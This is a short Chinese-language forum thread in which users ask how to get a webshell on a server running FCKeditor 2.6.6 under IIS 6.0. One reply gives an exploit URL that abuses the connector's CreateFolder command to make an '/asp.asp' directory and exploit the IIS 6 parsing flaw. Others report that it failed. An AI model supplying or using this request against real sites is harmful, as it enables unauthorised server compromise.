请问关于FCK 2.6.6版本有漏洞么?
FCKeditor编辑器版本2.6.6,执行脚本为ASP.NET,Web服务器IIS6.0存在解析漏洞,有什么办法可以GetShell么? exphttp://xxxx.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder直接建文件夹 我叫雷锋、 凡火火。 发表于 2015-5-25 18:50
exphttp://xxxx.com/fckeditor/editor/filemanager/connectors/aspx/connec ...
先谢谢你的回答,这个我在网上查到过,测试没有成功...... 楼主的问题,我也遇到过。但是没有突破成功 wuyan 发表于 2015-5-26 22:23
楼主的问题,我也遇到过。但是没有突破成功
我fckeditor也遇到了很多,一般2.6.4版本以上就很难突破,想看看论坛中有没有大神审计过发现新漏洞
页:
[1]